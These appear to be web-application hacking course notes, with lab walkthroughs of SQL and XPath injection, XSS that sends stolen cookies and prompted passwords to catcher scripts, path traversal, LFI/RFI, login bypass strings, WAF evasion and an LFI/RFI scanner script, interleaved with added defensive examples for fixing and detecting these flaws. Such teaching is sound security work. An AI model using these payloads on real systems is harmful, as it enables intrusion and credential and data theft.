Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.
2875
 
2876
Source Error:
2877
 
2878
 
2879
Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
2880
Line 113:            string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
2881
Line 114:            XmlNodeList xmln = doc.SelectNodes(credential);
2882
Line 115:            //String test = xmln.ToString();            
2883
Line 116:            if (xmln.Count > 0)
2884
 
2885
-----------------------------------------------------------------
2886
 
2887
 
2888
Hmm....System.Xml.XPath.XPathException.....that's not SQL.
2889
 
2890
WTF is this:
2891
Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
2892
 
2893
 
2894
 
2895
 
2896
In this case you'll have the trap the request with a proxy like:
2897
- Firefox Tamper Data
2898
- Burp Suite                http://www.portswigger.net/Burp/proxy.html
2899
- WebScarab             https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
2900
- Rat Proxy             https://code.google.com/p/ratproxy/
2901
- Zap Proxy             https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
2902
- Paros                 http://sourceforge.net/projects/paros/
2903
 
2904
 
2905
 
2906
Let's go back to that page error message.....
2907
 
2908
 
2909
Let's check it out:
2910
http://54.149.82.150/AuthInfo.xml
2911
 
2912
Looks like we found passwords!!!!!!!!!!
2913
 
2914
 
2915
Looks like there no significant new functionality after logging in with the stolen credentials.
2916
 
2917
Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links
2918
 
2919
 
2920
http://54.149.82.150/bookdetail.aspx?id=2
2921
 
2922
 
2923
Ok, there is parameter passing (bookdetail.aspx?id=2).
2924
 
2925
The page name is:       bookdetail.aspx
2926
The parameter name is:      id
2927
The paramber value is:      2
2928
 
2929
 
2930
Let's try throwing a single quote (') in there:
2931
 
2932
http://54.149.82.150/bookdetail.aspx?id=2'
2933
 
2934
 
2935
I get the following error:
2936
 
2937
Unclosed quotation mark after the character string ''.
2938
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
2939
 
2940
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
2941
 
2942
 
2943
 
2944
 
2945
 
2946
 
2947
 
2948
 
2949
 
2950
 
2951
#############################################################################
2952
# SQL Injection                                                             #
2953
# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
2954
#############################################################################
2955
 
2956
 
2957
- Another quick way to test for SQLI is to remove the paramter value
2958
 
2959
 
2960
#############################
2961
# Error-Based SQL Injection #
2962
#############################
2963
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
2964
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
2965
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
2966
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
2967
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
2968
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" - just means to keep going until you run out of databases
2969
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
2970
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
2971
http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
2972
 
2973
 
2974
 
2975
 
2976
#############################
# Union-Based SQL Injection #
#############################
http://54.149.82.150/bookdetail.aspx?id=2 order by 100--
http://54.149.82.150/bookdetail.aspx?id=2 order by 50--
http://54.149.82.150/bookdetail.aspx?id=2 order by 25--
http://54.149.82.150/bookdetail.aspx?id=2 order by 10--
http://54.149.82.150/bookdetail.aspx?id=2 order by 5--
http://54.149.82.150/bookdetail.aspx?id=2 order by 6--
http://54.149.82.150/bookdetail.aspx?id=2 order by 7--
http://54.149.82.150/bookdetail.aspx?id=2 order by 8--
http://54.149.82.150/bookdetail.aspx?id=2 order by 9--
http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

    We are using a union select statement because we are joining the developer's query with one of our own.
    Reference:
    http://www.techonthenet.com/sql/union.php
    The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
    It removes duplicate rows between the various SELECT statements.

    Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

    Negating the parameter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--



- Another way is to see if you can get the backend to perform an arithmetic function
http://54.149.82.150/bookdetail.aspx?id=(2)
http://54.149.82.150/bookdetail.aspx?id=(4-2)
http://54.149.82.150/bookdetail.aspx?id=(4-1)



http://54.149.82.150/bookdetail.aspx?id=2 or 1=1--
http://54.149.82.150/bookdetail.aspx?id=2 or 1=2--
http://54.149.82.150/bookdetail.aspx?id=1*1
http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1#
http://54.149.82.150/bookdetail.aspx?id=2 or 1<99#
http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1#
http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3--
http://54.149.82.150/bookdetail.aspx?id=2 &0#



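The "order by", union and arithmetic probes above all work for one reason: the id value is spliced into the query as text, so whatever follows the number is parsed as SQL. The following is an added example (not code from the course or the lab application) that rebuilds that bug against an in-memory SQLite table beside the parameterised version that closes it; the table name, columns and rows are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the bookdetail.aspx back end: a 3-column table.
# The course lab's real schema is not known; these rows are made up.
BOOKS = [
    (1, "Linux For InfoSec Pros", "Joe McCray"),
    (2, "Scripting For InfoSec Pros", "Joe McCray"),
    (3, "Web App Testing", "Example Author"),
]


def open_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (id INTEGER, title TEXT, author TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", BOOKS)
    return conn


def lookup_book_vulnerable(conn, raw_id):
    """The 'before' pattern: the id parameter is concatenated into the SQL,
    so whatever follows the number is parsed as part of the query."""
    sql = "SELECT id, title, author FROM books WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_book_hardened(conn, raw_id):
    """The fix: validate the type, then bind it as a parameter so the
    database only ever sees the value as a value, never as SQL text."""
    book_id = int(raw_id)  # ValueError for "2 or 1=1--" and friends
    sql = "SELECT id, title, author FROM books WHERE id = ?"
    return conn.execute(sql, (book_id,)).fetchall()


def is_rejected(conn, raw_id):
    """True when the hardened lookup refuses the input outright."""
    try:
        lookup_book_hardened(conn, raw_id)
    except ValueError:
        return True
    return False


def column_count_probe(conn, lookup, max_columns=9):
    """Mirror the 'order by N' walk from the notes: the largest N that does
    not error is the column count a UNION must match. Returns None when
    the lookup refuses the probe (the hardened version)."""
    found = None
    for n in range(1, max_columns + 1):
        try:
            lookup(conn, "2 order by %d--" % n)
            found = n
        except sqlite3.OperationalError:  # "ORDER BY term out of range"
            break
        except ValueError:                # hardened lookup rejected it
            return None
    return found
```

Against the vulnerable lookup, "2 or 1=1--" returns every row and "-2 union all select 1,2,3--" returns a row the attacker chose; the hardened lookup raises on both before any SQL is sent.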
###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER

3 - Total Characters
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--      (Ok, the username is 3 chars long - it waited 10 seconds)

Let's go for a quick check to see if it's DBO
http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--

Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.

D - 1st Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--  (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)

B - 2nd Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds

O - 3rd Character
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds



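Every WAITFOR DELAY probe above is a separate request, so the whole character-by-character walk leaves a very recognisable trail in the web server log. The following is an added example, not part of the course notes, that runs a few constructed Apache-style log lines (documentation IP addresses, the lab's bookdetail.aspx path) through detection rules for the techniques in this and the previous sections.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines modelled on the blind SQLi walk
# in the notes. Client addresses are documentation ranges, not the lab host.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Apr/2015:10:01:01 +0000] "GET /bookdetail.aspx?id=2 HTTP/1.1" 200 5120
203.0.113.5 - - [18/Apr/2015:10:01:05 +0000] "GET /bookdetail.aspx?id=2;%20IF%20(LEN(USER)=1)%20WAITFOR%20DELAY%20'00:00:10'-- HTTP/1.1" 200 5120
203.0.113.5 - - [18/Apr/2015:10:01:06 +0000] "GET /bookdetail.aspx?id=2;%20IF%20(ASCII(lower(substring((USER),1,1)))=100)%20WAITFOR%20DELAY%20'00:00:10'-- HTTP/1.1" 200 5120
203.0.113.5 - - [18/Apr/2015:10:01:09 +0000] "GET /bookdetail.aspx?id=-2+union+all+select+1,user,@@version,4,5,6,7,8,9-- HTTP/1.1" 200 5300
198.51.100.7 - - [18/Apr/2015:10:02:00 +0000] "GET /bookdetail.aspx?id=3 HTTP/1.1" 200 5100
"""

# Combined-log prefix: client ip, identd, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Each rule is named after the technique in the notes it corresponds to.
RULES = [
    ("time-based blind", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("char-by-char extraction", re.compile(r"\b(ascii|substring)\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("comment terminator", re.compile(r"--\s*$|#\s*$")),
]


def classify_request(path):
    """Decode the query string once, then return the names of every rule it trips."""
    decoded = unquote_plus(path)
    return [name for name, rx in RULES if rx.search(decoded)]


def find_sqli_requests(log_text):
    """Return (client_ip, decoded_path, [rule names]) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, path, _status = m.groups()
        matched = classify_request(path)
        if matched:
            hits.append((ip, unquote_plus(path), matched))
    return hits


def noisy_clients(hits, threshold=2):
    """Clients with at least `threshold` flagged requests: the per-character
    walk in the notes produces many near-identical probes from one source."""
    counts = {}
    for ip, _path, _rules in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

Note that the 200 status on every probe is exactly why time-based injection is hard to spot from status codes alone; the request content and the per-client burst are the signal.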
###################################################################
# What is XSS                                                     #
# https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
###################################################################

OK - what is Cross Site Scripting (XSS)?

1. Use Firefox to browse to the following location:

    http://54.172.112.249/xss_practice/

    A really simple search page that is vulnerable should come up.



2. In the search box type:

    <script>alert('So this is XSS')</script>

    This should pop up an alert window with your message in it, proving XSS is in fact possible.
    Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/


3. In the search box type:

    <script>alert(document.cookie)</script>

    This should pop up an alert window with your cookie in it, proving XSS is in fact possible and your cookie can be accessed.
    Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/

4. Now replace that alert script with:

    <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>

This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.


5. Now view the stolen cookie at:
    http://54.172.112.249/xss_practice/cookie_stealer_logs.html

The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.



############################
# A Better Way To Demo XSS #
############################

Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.

Use Firefox to browse to the following location:

    http://54.172.112.249/xss_practice/


Paste this in the search box
----------------------------

Option 1
--------

<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>

Now view the stolen password at:
    http://54.172.112.249/xss_practice/passwords.html


Option 2
--------
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
</script>


Now view the stolen username and password at:
http://54.172.112.249/xss_practice/username_password_logs.html



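Both XSS demos above rely on two things: the search term is written into the page exactly as typed, and the session cookie is readable from script. As an added example (not the xss_practice or course code), this shows the unencoded rendering beside an output-encoded one for the three payloads used in the first XSS section, plus a Set-Cookie value with HttpOnly so that document.cookie returns nothing for the session even if an XSS bug remains; the page template and the cookie name/value handling are constructed for the demo.

```python
import html
from http.cookies import SimpleCookie

# The three payloads typed into the xss_practice search box in the notes.
XSS_PROBES = [
    "<script>alert('So this is XSS')</script>",
    "<script>alert(document.cookie)</script>",
    '<script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>',
]

# Constructed page template standing in for the search results page.
PAGE = "<html><body><p>You searched for: {term}</p></body></html>"


def render_vulnerable(term):
    """The xss_practice behaviour: the search term goes into the page untouched."""
    return PAGE.format(term=term)


def render_hardened(term):
    """Output-encode for an HTML text context. quote=True also encodes
    quotes, which is what you want if the same value ever lands in an attribute."""
    return PAGE.format(term=html.escape(term, quote=True))


def contains_active_script(page_html):
    """Demo-only check: a raw <script tag in the response means the browser
    will execute whatever the attacker put in the search box."""
    return "<script" in page_html.lower()


def session_cookie_header(session_id, secure=True):
    """Build the Set-Cookie value for the session. HttpOnly stops
    document.cookie from reading it, so the cookie_catcher.php step in the
    notes receives nothing; SameSite=Lax and Secure are the usual companions."""
    cookie = SimpleCookie()
    cookie["ASP.NET_SessionId"] = session_id
    morsel = cookie["ASP.NET_SessionId"]
    morsel["httponly"] = True
    morsel["samesite"] = "Lax"
    if secure:
        morsel["secure"] = True
    return morsel.OutputString()


def cookie_is_httponly(set_cookie_value):
    """Review check for any Set-Cookie value: is the HttpOnly attribute present?"""
    attrs = [part.strip().lower() for part in set_cookie_value.split(";")]
    return "httponly" in attrs
```

The AcmeTrading cookie shown later in these notes is a convenient thing to run cookie_is_httponly() against when reviewing Tamper Data output.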
#########################################
# Let's kick it up a notch with ASP.NET #
# http://54.200.178.220/                #
#########################################

The trading Web App is on http://54.200.178.220/

Try the following in the search box:
    <script>alert(123);</script>
    ' or 1=1
    ' and a=a
    1=1
    Joe'+OR+1=1;--

    <script>alert(123);</script>

Open a new tab in Firefox and try this:
    http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName


Try the contact us form.
Open a new tab in Firefox and try this:
    http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini

Try this on the inquiry form:
    Joe McCray
    1234567890
    joe@strategicsec.com') waitfor delay '00:00:10'--


Login Box:

    ' or 1=1 or ''='
    anything            (click login instead of pressing enter)



Tamper Data: (notice 2 session IDs)

    AcmeTrading=a4b796687b846dd4a34931d708c62b49;       SessionID is md5
    IsAdmin=yes;
    ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45



Profile - Detail    (tamper data)
    Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
    joe|set


    xss_upload.txt (Upload Bulk Order)
    <script>alert(123);</script>



###############################
# How much fuzzing is enough? #
###############################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.

Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.


Step 1: Ask yourself the 3 questions per page of the site.

Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)

Step 3: When you load your fuzz strings - use the following decision tree

    - Are the fuzz strings causing a default error message (example 404)?
        - If this is the case then it is most likely NOT vulnerable

    - Are the fuzz strings causing a WAF or LB custom error message?
        - If this is the case then you need to find an encoding method to bypass

    - Are the fuzz strings causing an error message that discloses the backend type?
        - If yes, then identify DB type and find correct syntax to successfully exploit
        - Some example strings that I use are:
            '
            "
            ()          <----- Take the parameter value and put it in parenthesis
            (5-1)       <----- See if you can perform an arithmetic function

    - Are the fuzz strings rendering executable code?
        - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
        - Some example strings that I use are:
            <b>hello</b>
            <u>hello</u>
            <script>alert(123);</script>
            <script>alert(xss);</script>
            <script>alert('xss');</script>
            <script>alert("xss");</script>



############################
# Trading Web App with WAF #
# http://54.213.131.105    #
############################

Try the following in the search box:
    <script>alert(123);</script>
    <script>alert(123);</script
    <script>alert(123)
    <script>alert
    <script>
    <script
    <scrip
    <scri
    <scr
    <sc
    <s
    <p
    <
    < s
    Joe'+OR+1=1;--

Open a new tab in Firefox and try this:
    http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName


    xss_upload.txt (Upload Bulk Order)
    <script>alert(123);</script>


Login Box:

    ' or 1=1 or ''='
    anything



Tamper Data: (notice 2 session IDs)

    AcmeTrading=a4b796687b846dd4a34931d708c62b49;       SessionID is md5
    IsAdmin=yes;
    ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45



Profile - Detail    (tamper data)
    Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
    joe|set



###########################################################
# Attacking an Oracle/JSP based WebApp with SQL Injection #
###########################################################



http://54.69.156.253:8081/bookcompany/

user:   a' OR 'a'='a
pass:   a' OR 'a'='a



http://54.69.156.253:8081/bookcompany/author.jsp?id=111

[ Search by Username ]  Joe' OR 'a'='a



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1

http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

Host is running:



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--

User is:



http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--

Current database is:



######################
# Lesson 27: Web App #
######################
vi wpbruteforcer.py


python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt



- Here is an example of an LFI
- Open this page in Firefox:
http://54.172.112.249/showfile.php?filename=contactus.txt

- Notice the page name (showfile.php), the parameter name (filename) and the filename (contactus.txt)
- Here you see a direct reference to a file on the local filesystem of the victim machine.
- You can attack this by doing the following:
http://54.172.112.249/showfile.php?filename=/etc/passwd

- This is an example of a Local File Include (LFI). To change this attack into a Remote File Include (RFI) you need some content from
  somewhere else on the Internet. Here is an example of a text file on the web:
http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt

- Now we can attack the target via RFI like this:
http://54.172.112.249/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt

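The showfile.php behaviour above is what a file handler looks like when the filename parameter is used exactly as received: an absolute path, a ../ walk and a full URL are all accepted. As an added example (not the lab's PHP code), here is the containment check a hardened version of that handler would perform, written in Python; the base directory is an assumption for the demo and the request list is built from the three URLs in this section.

```python
import os
from urllib.parse import urlsplit

# Directory the handler is allowed to serve from (assumed for the demo; the
# real document root of the lab host is not known).
BASE_DIR = "/var/www/html/files"

# The filename values from the showfile.php URLs in the notes, plus the
# plain ../ form of the LFI.
REQUESTS = [
    "contactus.txt",
    "/etc/passwd",
    "../../../../etc/passwd",
    "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt",
]


def resolve_served_path(base_dir, filename):
    """Return the absolute path to serve, or None if the request must be refused.

    Refuses remote URLs (the RFI case), absolute paths, and anything whose
    normalised location is not strictly inside base_dir (the ../ LFI case).
    """
    if urlsplit(filename).scheme:          # "http://..." and any other scheme
        return None
    if os.path.isabs(filename):            # "/etc/passwd"
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # commonpath is the reliable containment test; a plain startswith()
    # would accept /var/www/html/files_old for a base of /var/www/html/files.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def triage(base_dir, filenames):
    """Map each requested name to 'serve' or 'refuse' (what you would log/alert on)."""
    return {name: ("serve" if resolve_served_path(base_dir, name) else "refuse")
            for name in filenames}
```

Refusing the URL form also removes the RFI case regardless of allow_url_include-style settings, since the value never reaches a file-open call.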
- Now let's see if we can write some code to do this for us:

vi LFI-RFI.py



#!/usr/bin/env python3
# LFI-RFI.py from the notes, updated from Python 2 (urllib2, print statements)
# to Python 3 so it runs on a current interpreter; the checks are unchanged.
print("\n### PHP LFI/RFI Detector ###")
print("### Sean Arries 09/18/09 ###\n")

import urllib.request, urllib.error, re, sys


TARGET = "http://54.172.112.249/showfile.php?filename=contactus.txt"
RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
TravLimit = 12

print("==> Testing for LFI vulns..")
TARGET = TARGET.split("=")[0]+"="  ## URL MANIPULATION: keep everything up to "filename="
for x in range(1,TravLimit):  ## ITERATE THROUGH THE LOOP, one more "../" each pass
    TARGET += "../"
    try:
        source = urllib.request.urlopen(TARGET+"etc/passwd").read().decode("utf-8","ignore")  ## WEB REQUEST
    except urllib.error.URLError as e:
        print("$$$ We had an Error:",e)
        sys.exit(0)
    if re.search("root:x:0:0:",source):  ## SEARCH FOR TEXT IN SOURCE
        print("!! ==> LFI Found:",TARGET+"etc/passwd")
        break  ## BREAK LOOP WHEN VULN FOUND

print("\n==> Testing for RFI vulns..")
TARGET = TARGET.split("=")[0]+"="+RFIVULN  ## URL MANIPULATION: point filename= at the remote file
try:
    source = urllib.request.urlopen(TARGET).read().decode("utf-8","ignore")  ## WEB REQUEST
except urllib.error.URLError as e:
    print("$$$ We had an Error:",e)
    sys.exit(0)
if re.search("j0e",source):  ## SEARCH FOR TEXT IN SOURCE
    print("!! => RFI Found:",TARGET)


print("\nScan Complete\n")  ## DONE